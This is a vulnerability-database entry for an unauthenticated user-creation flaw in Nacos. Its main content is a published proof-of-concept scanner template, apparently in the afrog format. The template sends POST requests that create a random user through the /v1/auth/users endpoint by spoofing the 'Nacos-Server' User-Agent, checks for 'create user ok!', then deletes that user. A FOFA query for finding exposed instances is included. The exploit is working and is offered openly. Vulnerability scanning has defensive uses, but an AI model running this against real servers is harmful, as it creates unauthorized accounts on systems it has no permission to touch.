nacos-create-user-unauthorized: Nacos Unauthorized Create User

日期: 2025-09-01 | 影响软件: nacos | POC: 已公开

漏洞描述

fofa app="NACOS"

PoC代码[已公开]

id: nacos-create-user-unauthorized

info:
  name: Nacos Unauthorized Create User
  author: zan8in
  severity: high
  verified: true
  description: fofa app="NACOS"

set:
    r1: randomLowercase(8)
    r2: randomLowercase(8)
rules:
  r0:
    request:
        method: POST
        path: /nacos/v1/auth/users?username={{r1}}&password={{r2}}
        headers:
          User-Agent: Nacos-Server
    expression: response.status == 200 && response.body.bcontains(bytes("create user ok!"))
  r1:
    request:
        method: POST
        path: /v1/auth/users?username={{r1}}&password={{r2}}
        headers:
          User-Agent: Nacos-Server
    expression: response.status == 200 && response.body.bcontains(bytes("create user ok!"))
  r2:
    request:
      method: DELETE
      path: /nacos/v1/auth/users?username={{r1}}
      headers:
          User-Agent: Nacos-Server
    expression: true
expression: (r0() && r2()) || (r1() && r2())

相关漏洞推荐